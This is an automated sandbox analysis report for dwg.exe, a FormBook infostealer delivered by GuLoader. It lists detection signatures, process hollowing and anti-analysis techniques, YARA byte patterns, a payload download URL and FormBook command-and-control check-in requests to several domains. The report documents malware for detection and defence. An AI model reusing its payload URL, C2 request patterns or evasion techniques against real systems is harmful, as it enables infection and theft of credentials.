Analysis Report dwg.exe

Overview

General Information

Sample Name: dwg.exe
Analysis ID: 357209
MD5: 92628cc54ad5d8ffed4f28f9bf9f80f8
SHA1: 586c6da770b640a04ad9f5d205308f5a2f84e42b
SHA256: 6e6fa2f1d1b7e3c37b6c7a18a4bd750e6ca980741c87af931c17d2ed7e469c3e
Tags: exe

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • dwg.exe (PID: 6408 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 92628CC54AD5D8FFED4F28F9BF9F80F8)
    • dwg.exe (PID: 6696 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 92628CC54AD5D8FFED4F28F9BF9F80F8)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6612 cmdline: /c del 'C:\Users\user\Desktop\dwg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x50e4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x197a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a84a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
    • 0x166d9:$sqlite3step: 68 34 1C 7B E1
    • 0x167ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16708:$sqlite3text: 68 38 2A 90 C5
    • 0x1682d:$sqlite3text: 68 38 2A 90 C5
    • 0x1671b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16843:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: dwg.exe | ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY
Source: 10.2.cmmon32.exe.49d7960.5.unpack | Avira: Label: TR/Dropper.Gen
Source: 10.2.cmmon32.exe.26e45d0.2.unpack | Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: dwg.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Binary contains paths to debug symbols
Source: Binary string: cmmon32.pdb source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000004.00000002.296549952.000000001E0E0000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.463015429.00000000045BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: dwg.exe, cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49719 -> 45.153.203.193:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1 Host: www.hamiltonparkpdx.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.readingqueens.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.winningscotland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1 Host: www.kreatelymedia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.neuroacademyok.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1 Host: www.india-vspakistanlive.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1 Host: www.bloomingintoyou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.25 192.0.78.25
Source: Joe Sandbox View | IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: NETLABFR NETLABFR
Source: global traffic | HTTP traffic detected: GET /nn.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 45.153.203.193 Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 45.153.203.193 (50 occurrences)
Source: global traffic | HTTP traffic detected: GET /nn.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 45.153.203.193 Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1 Host: www.hamiltonparkpdx.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.readingqueens.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.winningscotland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1 Host: www.kreatelymedia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1 Host: www.neuroacademyok.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1 Host: www.india-vspakistanlive.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1 Host: www.bloomingintoyou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.hamiltonparkpdx.com
Source: dwg.exe | String found in binary or memory: http://45.153.203.193/nn.bin
Source: explorer.exe, 00000005.00000000.277791370.000000000F540000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | String found in binary or memory: http://hhspapp8.com/dh5/index.html
Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | String found in binary or memory: http://www.hhappxz.com/
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | String found in binary or memory: https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxR
Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E6233 NtSetInformationThread,LoadLibraryA,NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E5C93 NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1084 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0511 EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2618 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2813 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E060A NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E623A NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E6448 NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2844 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E267E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1870 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E646C NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E246A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2E68 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E628E NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E62B4 NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E62DC NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E24D4 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E64C8 NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E26C1 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E6304 NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E052E NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E655C NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E635A NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2546 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0573 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E6380 NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E25AE NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E05A6 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E21D6 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E63FD NtResumeThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1497A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1495D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1498F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149650 NtQueryValueKey,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1496D0 NtCreateKey,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E14A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E14A770 NtOpenThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149770 NtSetInformationFile,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149760 NtOpenProcess,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E14AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149560 NtWriteFile,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1495F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149A10 NtQuerySection,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149B00 NtSetValueKey,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E14A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149820 NtEnumerateKey,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E14B040 NtSuspendThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1498A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E149950 NtQueueApcThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1499D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00565C93 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00566233 LoadLibraryA,NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00566448 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_0056646C NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005664C8 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_0056655C NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_0056623A NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005662DC NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_0056628E NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005662B4 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_0056635A NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00566304 NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005663FD NtSetInformationThread,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00566380 NtSetInformationThread,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045095D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045096D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509840 NtDelayExecution,LdrInitializeThunk,
